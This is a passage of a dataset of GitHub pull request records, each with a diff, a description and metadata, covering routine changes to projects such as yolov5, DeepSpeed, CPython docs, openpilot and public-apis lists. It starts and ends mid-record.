-def profile(x, ops, n=100, device=torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')):
+def profile(x, ops, n=100, device=None):
# profile a pytorch module or list of modules. Example usage:
# x = torch.randn(16, 3, 640, 640) # input
# m1 = lambda x: x * torch.sigmoid(x)
# m2 = nn.SiLU()
# profile(x, [m1, m2], n=100) # profile speed over 100 iterations
-
+
+ device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
x = x.to(device)
x.requires_grad = True
print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
| Should fix https://github.com/ultralytics/yolov5/issues/1695
## 🛠️ PR Summary
<sub>Made with ❤️ by [Ultralytics Actions](https://github.com/ultralytics/actions)<sub>
### 🌟 Summary
Improved device handling for profiling utility in YOLOv5.
### 📊 Key Changes
- Changed the default parameter of `device` from a static assignment to `None`.
- Dynamically setting the device inside the `profile` function if not provided.
### 🎯 Purpose & Impact
- 🛠️ **Flexibility**: This change allows the `profile` function to be more flexible by not forcing a predefined device, enhancing usability across different hardware.
- 💻 **Convenience**: Automatically selects the appropriate device (CPU or GPU), simplifying the function call for users.
- 🚀 **User-Friendly**: Potentially reduces errors for users who forget to specify a device, making the function more robust and user-friendly. | https://api.github.com/repos/ultralytics/yolov5/pulls/1701 | 2020-12-16T04:03:54Z | 2020-12-16T04:42:15Z | 2020-12-16T04:42:14Z | 2024-01-19T20:07:36Z | 276 | ultralytics/yolov5 | 25,028 |
ES.20: Fix typo | diff --git a/CppCoreGuidelines.md b/CppCoreGuidelines.md
index b9928bd0d..c1edeb390 100644
--- a/CppCoreGuidelines.md
+++ b/CppCoreGuidelines.md
@@ -10108,7 +10108,7 @@ Many such errors are introduced during maintenance years after the initial imple
##### Exception
-It you are declaring an object that is just about to be initialized from input, initializing it would cause a double initialization.
+If you are declaring an object that is just about to be initialized from input, initializing it would cause a double initialization.
However, beware that this may leave uninitialized data beyond the input -- and that has been a fertile source of errors and security breaches:
constexpr int max = 8 * 1024;
| https://api.github.com/repos/isocpp/CppCoreGuidelines/pulls/1033 | 2017-09-18T21:04:49Z | 2017-09-18T21:50:19Z | 2017-09-18T21:50:19Z | 2017-09-18T21:50:19Z | 172 | isocpp/CppCoreGuidelines | 15,723 | |
Update Passlib hyperlink in README.md | diff --git a/README.md b/README.md
index 92784dd0c..4481d9efa 100644
--- a/README.md
+++ b/README.md
@@ -332,7 +332,7 @@ Inspired by [awesome-php](https://github.com/ziadoz/awesome-php).
* [cryptography](https://cryptography.io/en/latest/) - A package designed to expose cryptographic primitives and recipes to Python developers.
* [hashids](https://github.com/davidaurelio/hashids-python) - Implementation of [hashids](http://hashids.org) in Python.
* [Paramiko](http://www.paramiko.org/) - A Python (2.6+, 3.3+) implementation of the SSHv2 protocol, providing both client and server functionality.
-* [Passlib](https://pythonhosted.org/passlib/) - Secure password storage/hashing library, very high level.
+* [Passlib](https://passlib.readthedocs.io/en/stable/) - Secure password storage/hashing library, very high level.
* [PyNacl](https://github.com/pyca/pynacl) - Python binding to the Networking and Cryptography (NaCl) library.
## Data Analysis
| Update outdated Passlib hyperlink. | https://api.github.com/repos/vinta/awesome-python/pulls/1086 | 2018-06-25T03:52:00Z | 2018-08-04T10:49:41Z | 2018-08-04T10:49:41Z | 2018-08-04T10:49:41Z | 263 | vinta/awesome-python | 27,024 |
turn excessive noise off | diff --git a/deepspeed/runtime/engine.py b/deepspeed/runtime/engine.py
index 770f961908f1..3437998e534e 100755
--- a/deepspeed/runtime/engine.py
+++ b/deepspeed/runtime/engine.py
@@ -2051,7 +2051,7 @@ def _copy_recovery_script(self, save_path):
script = "zero_to_fp32.py"
src = os.path.join(base_dir, "utils", script)
dst = os.path.join(save_path, script)
- logger.info(f"creating recovery script {dst}")
+ #logger.info(f"creating recovery script {dst}")
copyfile(src, dst)
# make executable
os.chmod(dst, os.stat(dst).st_mode | stat.S_IEXEC)
@@ -2064,7 +2064,7 @@ def _save_zero_checkpoint(self, save_path, tag):
ds_version=version)
torch.save(zero_sd, zero_checkpoint_name)
self._copy_recovery_script(save_path)
- logger.info('zero checkpoint saved {}'.format(zero_checkpoint_name))
+ #logger.info('zero checkpoint saved {}'.format(zero_checkpoint_name))
def _zero3_consolidated_fp16_state_dict(self):
"""
diff --git a/deepspeed/runtime/pipe/module.py b/deepspeed/runtime/pipe/module.py
index af4df2a10ebf..977ce599622f 100644
--- a/deepspeed/runtime/pipe/module.py
+++ b/deepspeed/runtime/pipe/module.py
@@ -577,10 +577,10 @@ def load_state_dir(self, load_dir, strict=True):
layer.load_state_dict(checkpoint)
- if self._grid.data_parallel_id == 0:
- logger.info(
- f'RANK={self.global_rank} Loaded layer={idx+self._local_start} file={load_path}'
- )
+ # if self._grid.data_parallel_id == 0:
+ # logger.info(
+ # f'RANK={self.global_rank} Loaded layer={idx+self._local_start} file={load_path}'
+ # )
self._synchronize_tied_weights()
diff --git a/deepspeed/runtime/state_dict_factory.py b/deepspeed/runtime/state_dict_factory.py
index 033b6726ddb3..f5562e141c3f 100755
--- a/deepspeed/runtime/state_dict_factory.py
+++ b/deepspeed/runtime/state_dict_factory.py
@@ -78,7 +78,7 @@ def load(self,
merge_count = 1
if num_ckpt == mp_world_size:
assert os.path.exists(load_path)
- logger.info(f'rank: {mp_rank} loading checkpoint: {load_path}')
+ #logger.info(f'rank: {mp_rank} loading checkpoint: {load_path}')
sd = torch.load(load_path, map_location=lambda storage, loc: storage)
if quantize:
@@ -158,7 +158,7 @@ def set_module(self, sd, module):
return sd
def check_ckpt_list(self):
- logger.info(f'checkpoint file list: {self.ckpt_list}')
+ #logger.info(f'checkpoint file list: {self.ckpt_list}')
assert len(self.ckpt_list) > 0
sd = torch.load(self.ckpt_list[0], map_location=lambda storage, loc: storage)
| not sure if you'd like that on the main branch, but turning some of the excessive noise off on the big-science branch. Thank you!
@tjruwase | https://api.github.com/repos/microsoft/DeepSpeed/pulls/1293 | 2021-08-10T04:42:51Z | 2021-08-11T12:20:38Z | 2021-08-11T12:20:38Z | 2021-08-11T12:20:38Z | 732 | microsoft/DeepSpeed | 10,546 |
chore(deps-dev): bump pylint from 2.4.4 to 2.7.0 | diff --git a/poetry.lock b/poetry.lock
index d9debe339..7aba1d892 100644
--- a/poetry.lock
+++ b/poetry.lock
@@ -8,17 +8,16 @@ python-versions = "*"
[[package]]
name = "astroid"
-version = "2.3.3"
+version = "2.5"
description = "An abstract syntax tree for Python with inference support."
category = "dev"
optional = false
-python-versions = ">=3.5.*"
+python-versions = ">=3.6"
[package.dependencies]
-lazy-object-proxy = ">=1.4.0,<1.5.0"
-six = ">=1.12,<2.0"
+lazy-object-proxy = ">=1.4.0"
typed-ast = {version = ">=1.4.0,<1.5", markers = "implementation_name == \"cpython\" and python_version < \"3.8\""}
-wrapt = ">=1.11.0,<1.12.0"
+wrapt = ">=1.11,<1.13"
[[package]]
name = "atomicwrites"
@@ -228,17 +227,21 @@ python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*"
[[package]]
name = "pylint"
-version = "2.4.4"
+version = "2.7.0"
description = "python code static checker"
category = "dev"
optional = false
-python-versions = ">=3.5.*"
+python-versions = "~=3.6"
[package.dependencies]
-astroid = ">=2.3.0,<2.4"
+astroid = "2.5.0"
colorama = {version = "*", markers = "sys_platform == \"win32\""}
-isort = ">=4.2.5,<5"
+isort = ">=4.2.5,<6"
mccabe = ">=0.6,<0.7"
+toml = ">=0.7.1"
+
+[package.extras]
+docs = ["sphinx (>=3.2,<4.0)", "python-docs-theme"]
[[package]]
name = "pyparsing"
@@ -286,14 +289,6 @@ category = "dev"
optional = false
python-versions = "*"
-[[package]]
-name = "six"
-version = "1.14.0"
-description = "Python 2 and 3 compatibility utilities"
-category = "dev"
-optional = false
-python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*"
-
[[package]]
name = "toml"
version = "0.10.0"
@@ -333,7 +328,7 @@ testing = ["jaraco.itertools", "func-timeout"]
[metadata]
lock-version = "1.1"
python-versions = "^3.6"
-content-hash = "6cb154d248e0d13adbb5229f52d1c1ab9ce2ea9cfe54091cf34cd97ccb822653"
+content-hash = "441f4ec509fbee3d303586c3abba92d71c5148600632f11c7069c709fa67774c"
[metadata.files]
appdirs = [
@@ -341,8 +336,8 @@ appdirs = [
{file = "appdirs-1.4.3.tar.gz", hash = "sha256:9e5896d1372858f8dd3344faf4e5014d21849c756c8d5701f78f8a103b372d92"},
]
astroid = [
- {file = "astroid-2.3.3-py3-none-any.whl", hash = "sha256:840947ebfa8b58f318d42301cf8c0a20fd794a33b61cc4638e28e9e61ba32f42"},
- {file = "astroid-2.3.3.tar.gz", hash = "sha256:71ea07f44df9568a75d0f354c49143a4575d90645e9fead6dfb52c26a85ed13a"},
+ {file = "astroid-2.5-py3-none-any.whl", hash = "sha256:87ae7f2398b8a0ae5638ddecf9987f081b756e0e9fc071aeebdca525671fc4dc"},
+ {file = "astroid-2.5.tar.gz", hash = "sha256:b31c92f545517dcc452f284bc9c044050862fbe6d93d2b3de4a215a6b384bf0d"},
]
atomicwrites = [
{file = "atomicwrites-1.3.0-py2.py3-none-any.whl", hash = "sha256:03472c30eb2c5d1ba9227e4c2ca66ab8287fbfbbda3888aa93dc2e28fc6811b4"},
@@ -503,8 +498,8 @@ py = [
{file = "py-1.10.0.tar.gz", hash = "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3"},
]
pylint = [
- {file = "pylint-2.4.4-py3-none-any.whl", hash = "sha256:886e6afc935ea2590b462664b161ca9a5e40168ea99e5300935f6591ad467df4"},
- {file = "pylint-2.4.4.tar.gz", hash = "sha256:3db5468ad013380e987410a8d6956226963aed94ecb5f9d3a28acca6d9ac36cd"},
+ {file = "pylint-2.7.0-py3-none-any.whl", hash = "sha256:3ea3926700db399765db1faf53860f11e4e981a090646e9eacd01ca78e020579"},
+ {file = "pylint-2.7.0.tar.gz", hash = "sha256:2e0c6749d809985e4f181c336a8f89b2b797340d8049160bf95f35a3f0ecf6fc"},
]
pyparsing = [
{file = "pyparsing-2.4.7-py2.py3-none-any.whl", hash = "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b"},
@@ -542,10 +537,6 @@ rope = [
{file = "rope-0.14.0-py3-none-any.whl", hash = "sha256:f0dcf719b63200d492b85535ebe5ea9b29e0d0b8aebeb87fe03fc1a65924fdaf"},
{file = "rope-0.14.0.tar.gz", hash = "sha256:c5c5a6a87f7b1a2095fb311135e2a3d1f194f5ecb96900fdd0a9100881f48aaf"},
]
-six = [
- {file = "six-1.14.0-py2.py3-none-any.whl", hash = "sha256:8f3cd2e254d8f793e7f3d6d9df77b92252b52637291d0f0da013c76ea2724b6c"},
- {file = "six-1.14.0.tar.gz", hash = "sha256:236bdbdce46e6e6a3d61a337c0f8b763ca1e8717c03b369e87a7ec7ce1319c0a"},
-]
toml = [
{file = "toml-0.10.0-py2.7.egg", hash = "sha256:f1db651f9657708513243e61e6cc67d101a39bad662eaa9b5546f789338e07a3"},
{file = "toml-0.10.0-py2.py3-none-any.whl", hash = "sha256:235682dd292d5899d361a811df37e04a8828a5b1da3115886b73cf81ebc9100e"},
diff --git a/pyproject.toml b/pyproject.toml
index 934b91ce5..54f2222f3 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -17,7 +17,7 @@ contextvars = { version = "^2.4", python = "~3.6" }
[tool.poetry.dev-dependencies]
pytest = "^6.2"
-pylint = "^2.4"
+pylint = "^2.7"
black = {version = "^19.0", allow-prereleases = true}
rope = "^0.14.0"
isort = "^4.3"
| Bumps [pylint](https://github.com/PyCQA/pylint) from 2.4.4 to 2.7.0.
<details>
<summary>Changelog</summary>
<p><em>Sourced from <a href="https://github.com/PyCQA/pylint/blob/master/ChangeLog">pylint's changelog</a>.</em></p>
<blockquote>
<h1>What's New in Pylint 2.7.0?</h1>
<p>Release date: 2021-02-21</p>
<ul>
<li>
<p>Introduce DeprecationMixin for reusable deprecation checks.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4049">#4049</a></p>
</li>
<li>
<p>Fix false positive for <code>builtin-not-iterating</code> when <code>map</code> receives iterable</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4078">#4078</a></p>
</li>
<li>
<p>Python 3.6+ is now required.</p>
</li>
<li>
<p>Fix false positive for <code>builtin-not-iterating</code> when <code>zip</code> receives iterable</p>
</li>
<li>
<p>Add <code>nan-comparison</code> check for NaN comparisons</p>
</li>
<li>
<p>Bug fix for empty-comment message line number.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/4009">#4009</a></p>
</li>
<li>
<p>Only emit <code>bad-reversed-sequence</code> on dictionaries if below py3.8</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3940">#3940</a></p>
</li>
<li>
<p>Handle class decorators applied to function.</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3882">#3882</a></p>
</li>
<li>
<p>Add check for empty comments</p>
</li>
<li>
<p>Fix minor documentation issue in contribute.rst</p>
</li>
<li>
<p>Enums are now required to be named in UPPER_CASE by <code>invalid-name</code>.</p>
<p>Close <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3834">#3834</a></p>
</li>
<li>
<p>Add missing checks for deprecated functions.</p>
</li>
<li>
<p>Postponed evaluation of annotations are now recognized by default if python version is above 3.10</p>
<p>Closes <a href="https://github-redirect.dependabot.com/PyCQA/pylint/issues/3992">#3992</a></p>
</li>
<li>
<p>Fix column metadata for anomalous backslash lints</p>
</li>
<li>
<p>Drop support for Python 3.5</p>
</li>
<li>
<p>Add support for pep585 with postponed evaluation</p>
</li>
</ul>
<!-- raw HTML omitted -->
</blockquote>
<p>... (truncated)</p>
</details>
<details>
<summary>Commits</summary>
<ul>
<li><a href="https://github.com/PyCQA/pylint/commit/5e04ce74faa0142fe3ff99eec08479cfaeb9584c"><code>5e04ce7</code></a> Better documentation for the change in version during release</li>
<li><a href="https://github.com/PyCQA/pylint/commit/41d70221cdce96a209a479e349bdb70180bb5e8e"><code>41d7022</code></a> Upgrade the documentation about release</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ac85223e5b8d0885d4717cec9499ab01bbd30fb6"><code>ac85223</code></a> Apply copyrite --contribution-threshold</li>
<li><a href="https://github.com/PyCQA/pylint/commit/6e2de8e3a2e2c5586e876ca305f0844bdd822db3"><code>6e2de8e</code></a> Upgrade version to 2.7.0 and fix astroid to 2.5.0</li>
<li><a href="https://github.com/PyCQA/pylint/commit/b9d9ca239c7f552abb3755cb04d73e3cd34e4530"><code>b9d9ca2</code></a> Edit highlights for 2.7.0 in whatsnew</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ca110478acd0f0ad73b0ea20627d36402be401c8"><code>ca11047</code></a> Fix link to isort documentation in doc/faq.rst</li>
<li><a href="https://github.com/PyCQA/pylint/commit/ee910755b90af58d6aa9b908b5afe4310c5b26db"><code>ee91075</code></a> Migrate from % syntax or bad format() syntax to fstring</li>
<li><a href="https://github.com/PyCQA/pylint/commit/5bed07eba999130b6551acc7c43192d6a8eada43"><code>5bed07e</code></a> Move from % string formatting syntax to f-string or .format()</li>
<li><a href="https://github.com/PyCQA/pylint/commit/a1e553d3bb07c56ca99c31279f9af104bede0a32"><code>a1e553d</code></a> Add pyupgrade to the pre-commit configuration</li>
<li><a href="https://github.com/PyCQA/pylint/commit/154718cf610285be12cf72954ba7b88cda48eada"><code>154718c</code></a> Remove the # coding, since PEP3120 the default is UTF8</li>
<li>Additional commits viewable in <a href="https://github.com/PyCQA/pylint/compare/pylint-2.4.4...pylint-2.7.0">compare view</a></li>
</ul>
</details>
<br />
[](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores)
Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.
[//]: # (dependabot-automerge-start)
[//]: # (dependabot-automerge-end)
---
<details>
<summary>Dependabot commands and options</summary>
<br />
You can trigger Dependabot actions by commenting on this PR:
- `@dependabot rebase` will rebase this PR
- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it
- `@dependabot merge` will merge this PR after your CI passes on it
- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it
- `@dependabot cancel merge` will cancel a previously requested merge and block automerging
- `@dependabot reopen` will reopen this PR if it is closed
- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
</details> | https://api.github.com/repos/mingrammer/diagrams/pulls/470 | 2021-02-22T08:44:11Z | 2021-02-22T17:42:56Z | 2021-02-22T17:42:55Z | 2021-02-22T17:43:04Z | 2,120 | mingrammer/diagrams | 52,704 |
[3.11] gh-115652: Fix indentation in the documentation of multiprocessing.get_start_method (GH-115658) | diff --git a/Doc/library/multiprocessing.rst b/Doc/library/multiprocessing.rst
index 7745447065733f..3410e37e3abe1f 100644
--- a/Doc/library/multiprocessing.rst
+++ b/Doc/library/multiprocessing.rst
@@ -1065,13 +1065,13 @@ Miscellaneous
or ``None``. ``'fork'`` is the default on Unix, while ``'spawn'`` is
the default on Windows and macOS.
-.. versionchanged:: 3.8
+ .. versionadded:: 3.4
- On macOS, the *spawn* start method is now the default. The *fork* start
- method should be considered unsafe as it can lead to crashes of the
- subprocess. See :issue:`33725`.
+ .. versionchanged:: 3.8
- .. versionadded:: 3.4
+ On macOS, the *spawn* start method is now the default. The *fork* start
+ method should be considered unsafe as it can lead to crashes of the
+ subprocess. See :issue:`33725`.
.. function:: set_executable(executable)
| (cherry picked from commit d504968983c5cd5ddbdf73ccd3693ffb89e7952f)
Co-authored-by: Daniel Haag <121057143+denialhaag@users.noreply.github.com>
<!-- gh-issue-number: gh-115652 -->
* Issue: gh-115652
<!-- /gh-issue-number -->
<!-- readthedocs-preview cpython-previews start -->
----
📚 Documentation preview 📚: https://cpython-previews--115660.org.readthedocs.build/
<!-- readthedocs-preview cpython-previews end --> | https://api.github.com/repos/python/cpython/pulls/115660 | 2024-02-19T14:26:38Z | 2024-02-19T15:09:07Z | 2024-02-19T15:09:07Z | 2024-02-19T15:09:10Z | 270 | python/cpython | 4,781 |
Add image-charts API | diff --git a/README.md b/README.md
index ea31376728..c7996d50e1 100644
--- a/README.md
+++ b/README.md
@@ -248,6 +248,7 @@ API | Description | Auth | HTTPS | CORS |
| [Gitter](https://github.com/gitterHQ/docs) | Chat for GitHub | `OAuth` | Yes | Unknown |
| [HTTP2.Pro](https://http2.pro/doc/api) | Test endpoints for client and server HTTP/2 protocol support | No | Yes | Unknown |
| [IBM Text to Speech](https://console.bluemix.net/docs/services/text-to-speech/getting-started.html) | Convert text to speech | `apiKey` | Yes | Yes |
+| [Image-Charts](https://documentation.image-charts.com/) | Generate charts, QR codes and graph images | No | Yes | Yes |
| [import.io](http://api.docs.import.io/) | Retrieve structured data from a website or RSS feed | `apiKey` | Yes | Unknown |
| [IPify](https://www.ipify.org/) | A simple IP Address API | No | Yes | Unknown |
| [IPinfo](https://ipinfo.io/developers) | Another simple IP Address API | No | Yes | Unknown |
| Thank you for taking the time to work on a Pull Request for this project!
To ensure your PR is dealt with swiftly please check the following:
- [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md)
- [x] Your additions are ordered alphabetically
- [x] Your submission has a useful description
- [x] The description does not end with punctuation
- [x] Each table column should be padded with one space on either side
- [x] You have searched the repository for any relevant issues or pull requests
- [n/a] Any category you are creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
| https://api.github.com/repos/public-apis/public-apis/pulls/1004 | 2019-08-26T13:42:09Z | 2020-05-14T11:13:01Z | 2020-05-14T11:13:01Z | 2020-05-14T15:29:31Z | 276 | public-apis/public-apis | 35,466 |
replay: add nice arg parser | diff --git a/selfdrive/ui/replay/main.cc b/selfdrive/ui/replay/main.cc
index acc8b5d4d36157..be36d5f65d1769 100644
--- a/selfdrive/ui/replay/main.cc
+++ b/selfdrive/ui/replay/main.cc
@@ -3,8 +3,11 @@
#include <termios.h>
#include <QApplication>
+#include <QCommandLineParser>
#include <QThread>
+const QString DEMO_ROUTE = "3533c53bb29502d1|2019-12-10--01-13-27";
+
int getch() {
int ch;
struct termios oldt;
@@ -58,18 +61,28 @@ void keyboardThread(Replay *replay) {
int main(int argc, char *argv[]){
QApplication a(argc, argv);
- QString route(argv[1]);
- if (route == "") {
- printf("Usage: ./replay \"route\"\n");
- printf(" For a public demo route, use '3533c53bb29502d1|2019-12-10--01-13-27'\n");
- return 1;
+ QCommandLineParser parser;
+ parser.setApplicationDescription("Mock openpilot components by publishing logged messages.");
+ parser.addHelpOption();
+ parser.addPositionalArgument("route", "the drive to replay. find your drives at connect.comma.ai");
+ parser.addOption({{"a", "allow"}, "whitelist of services to send", "allow"});
+ parser.addOption({{"b", "block"}, "blacklist of services to send", "block"});
+ parser.addOption({"demo", "use a demo route instead of providing your own"});
+
+ parser.process(a);
+ const QStringList args = parser.positionalArguments();
+ if (args.empty() && !parser.isSet("demo")) {
+ parser.showHelp();
}
- Replay *replay = new Replay(route);
+ const QString route = args.empty() ? DEMO_ROUTE : args.first();
+ Replay *replay = new Replay(route, parser.value("allow").split(","), parser.value("block").split(","));
replay->start();
+ // start keyboard control thread
QThread *t = QThread::create(keyboardThread, replay);
QObject::connect(t, &QThread::finished, t, &QThread::deleteLater);
t->start();
+
return a.exec();
}
diff --git a/selfdrive/ui/replay/replay.cc b/selfdrive/ui/replay/replay.cc
index 3cef0bcd792a0a..6f76cd73d74b4b 100644
--- a/selfdrive/ui/replay/replay.cc
+++ b/selfdrive/ui/replay/replay.cc
@@ -8,13 +8,7 @@
#include "selfdrive/common/timing.h"
#include "selfdrive/hardware/hw.h"
-Replay::Replay(QString route, SubMaster *sm_, QObject *parent) : sm(sm_), QObject(parent) {
- QStringList block = QString(getenv("BLOCK")).split(",");
- qDebug() << "blocklist" << block;
-
- QStringList allow = QString(getenv("ALLOW")).split(",");
- qDebug() << "allowlist" << allow;
-
+Replay::Replay(QString route, QStringList allow, QStringList block, SubMaster *sm_, QObject *parent) : sm(sm_), QObject(parent) {
std::vector<const char*> s;
for (const auto &it : services) {
if ((allow[0].size() == 0 || allow.contains(it.name)) &&
diff --git a/selfdrive/ui/replay/replay.h b/selfdrive/ui/replay/replay.h
index 8b7dc93b4a0382..7a1ea13c0ed6ab 100644
--- a/selfdrive/ui/replay/replay.h
+++ b/selfdrive/ui/replay/replay.h
@@ -20,7 +20,7 @@ class Replay : public QObject {
Q_OBJECT
public:
- Replay(QString route, SubMaster *sm = nullptr, QObject *parent = 0);
+ Replay(QString route, QStringList allow, QStringList block, SubMaster *sm = nullptr, QObject *parent = 0);
void start();
void addSegment(int n);
| https://api.github.com/repos/commaai/openpilot/pulls/22264 | 2021-09-17T07:06:18Z | 2021-09-17T07:33:23Z | 2021-09-17T07:33:23Z | 2021-09-17T07:33:24Z | 944 | commaai/openpilot | 8,988 | |
Multilang: Update pt-BR translation | diff --git a/selfdrive/ui/translations/main_pt-BR.ts b/selfdrive/ui/translations/main_pt-BR.ts
index f983c8fb4b6fd2..e89a3b1f5a2fc1 100644
--- a/selfdrive/ui/translations/main_pt-BR.ts
+++ b/selfdrive/ui/translations/main_pt-BR.ts
@@ -68,23 +68,23 @@
</message>
<message>
<source>Hidden Network</source>
- <translation type="unfinished"></translation>
+ <translation>Rede Oculta</translation>
</message>
<message>
<source>CONNECT</source>
- <translation type="unfinished">CONEXÃO</translation>
+ <translation>CONECTE</translation>
</message>
<message>
<source>Enter SSID</source>
- <translation type="unfinished">Insira SSID</translation>
+ <translation>Digite o SSID</translation>
</message>
<message>
<source>Enter password</source>
- <translation type="unfinished">Insira a senha</translation>
+ <translation>Insira a senha</translation>
</message>
<message>
<source>for "%1"</source>
- <translation type="unfinished">para "%1"</translation>
+ <translation>para "%1"</translation>
</message>
</context>
<context>
| https://api.github.com/repos/commaai/openpilot/pulls/30987 | 2024-01-13T02:13:59Z | 2024-01-13T02:25:42Z | 2024-01-13T02:25:42Z | 2024-01-13T12:05:43Z | 323 | commaai/openpilot | 9,698 | |
update table metric | diff --git a/ppstructure/table/README.md b/ppstructure/table/README.md
index 3732a89c54..a5d0da3ccd 100644
--- a/ppstructure/table/README.md
+++ b/ppstructure/table/README.md
@@ -33,8 +33,8 @@ We evaluated the algorithm on the PubTabNet<sup>[1]</sup> eval dataset, and the
|Method|Acc|[TEDS(Tree-Edit-Distance-based Similarity)](https://github.com/ibm-aur-nlp/PubTabNet/tree/master/src)|Speed|
| --- | --- | --- | ---|
| EDD<sup>[2]</sup> |x| 88.3 |x|
-| TableRec-RARE(ours) |73.8%| 95.3% |1550ms|
-| SLANet(ours) | 76.2%| 95.85% |766ms|
+| TableRec-RARE(ours) | 71.73%| 93.88% |779ms|
+| SLANet(ours) | 76.31%| 95.89%|766ms|
The performance indicators are explained as follows:
- Acc: The accuracy of the table structure in each image, a wrong token is considered an error.
diff --git a/ppstructure/table/README_ch.md b/ppstructure/table/README_ch.md
index cc73f8bcec..e83c81befb 100644
--- a/ppstructure/table/README_ch.md
+++ b/ppstructure/table/README_ch.md
@@ -39,8 +39,8 @@
|算法|Acc|[TEDS(Tree-Edit-Distance-based Similarity)](https://github.com/ibm-aur-nlp/PubTabNet/tree/master/src)|Speed|
| --- | --- | --- | ---|
| EDD<sup>[2]</sup> |x| 88.3% |x|
-| TableRec-RARE(ours) |73.8%| 95.3% |1550ms|
-| SLANet(ours) | 76.2%| 95.85% |766ms|
+| TableRec-RARE(ours) | 71.73%| 93.88% |779ms|
+| SLANet(ours) |76.31%| 95.89%|766ms|
性能指标解释如下:
- Acc: 模型对每张图像里表格结构的识别准确率,错一个token就算错误。
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/7272 | 2022-08-20T08:43:20Z | 2022-08-21T02:56:08Z | 2022-08-21T02:56:08Z | 2022-08-21T02:56:08Z | 553 | PaddlePaddle/PaddleOCR | 42,767 | |
Add Land Transport Authority DataMall, Singapore | diff --git a/README.md b/README.md
index b2fcab633e..33ee3be429 100644
--- a/README.md
+++ b/README.md
@@ -1495,6 +1495,7 @@ API | Description | Auth | HTTPS | CORS |
| [Icelandic APIs](http://docs.apis.is/) | Open APIs that deliver services in or regarding Iceland | No | Yes | Unknown |
| [Impala Hotel Bookings](https://docs.impala.travel/docs/booking-api/) | Hotel content, rates and room bookings | `apiKey` | Yes | No |
| [Izi](http://api-docs.izi.travel/) | Audio guide for travellers | `apiKey` | Yes | Unknown |
+| [Land Transport Authority DataMall, Singapore](https://datamall.lta.gov.sg/content/dam/datamall/datasets/LTA_DataMall_API_User_Guide.pdf) | Singapore transport information | `apiKey` | No | Unknown |
| [Metro Lisboa](http://app.metrolisboa.pt/status/getLinhas.php) | Delays in subway lines | No | No | No |
| [Navitia](https://doc.navitia.io/) | The open API for building cool stuff with transport data | `apiKey` | Yes | Unknown |
| [Open Charge Map](https://openchargemap.org/site/develop/api) | Global public registry of electric vehicle charging locations | `apiKey` | Yes | Yes |
| <!-- Thank you for taking the time to work on a Pull Request for this project! -->
<!-- To ensure your PR is dealt with swiftly please check the following: -->
- [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not have more than 100 characters
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/2787 | 2021-10-29T14:05:24Z | 2021-10-30T01:01:00Z | 2021-10-30T01:01:00Z | 2021-10-30T01:01:01Z | 312 | public-apis/public-apis | 35,778 |
[doc] xref to hostfile discussion | diff --git a/docs/_pages/features.md b/docs/_pages/features.md
index ec0724e11aa4..2074bb3e3b0f 100755
--- a/docs/_pages/features.md
+++ b/docs/_pages/features.md
@@ -28,7 +28,8 @@ deepspeed --hostfile=<hostfile> \
<client_entry.py> <client args> \
--deepspeed --deepspeed_config ds_config.json
```
-The script `<client_entry.py>` will execute on the resources specified in `<hostfile>`.
+The script `<client_entry.py>` will execute on the resources specified in
+[`<hostfile>`](/getting-started/#resource-configuration-multi-node).
## Pipeline Parallelism
DeepSpeed provides [pipeline parallelism](/tutorials/pipeline/) for memory-
| it wasn't clear where to find what was meant by `hostfile` - so adding a link to where it's discussed, now that I found it. | https://api.github.com/repos/microsoft/DeepSpeed/pulls/604 | 2020-12-15T20:14:43Z | 2020-12-15T21:44:33Z | 2020-12-15T21:44:33Z | 2020-12-15T21:47:04Z | 179 | microsoft/DeepSpeed | 10,319 |
Added Spark NLP to Scala NLP section | diff --git a/README.md b/README.md
index cba91027..6656f8c1 100644
--- a/README.md
+++ b/README.md
@@ -1350,6 +1350,7 @@ be
* [Chalk](https://github.com/scalanlp/chalk) - Chalk is a natural language processing library. **[Deprecated]**
